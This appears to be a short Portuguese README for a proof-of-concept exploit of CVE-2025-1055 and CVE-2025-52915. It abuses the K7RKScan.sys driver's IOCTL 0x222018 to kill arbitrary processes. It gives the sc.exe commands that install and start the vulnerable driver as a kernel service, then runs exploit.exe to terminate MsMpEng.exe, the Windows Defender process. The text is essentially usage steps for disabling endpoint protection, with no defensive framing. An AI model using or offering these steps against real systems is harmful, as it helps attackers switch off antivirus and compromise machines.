
PoC para CVE-2025-1055 e CVE-2025-52915 usando K7RKScan.sys
PoC para CVE-2025-1055 e CVE-2025-52915 usando K7RKScan.sys. Este PoC usa o IOCTL 0x222018 para encerrar processos arbitrários.
Instalando driver:
sc.exe create K7RKScan_1516.sys binPath=C:\Users\Administrator\Downloads\K7RKScan_1516.sys type=kernel && sc.exe start K7RKScan_1516.sys
Executando PoC:
exploit.exe
Isso encerrará o processo MsMpEng.exe (windows defender).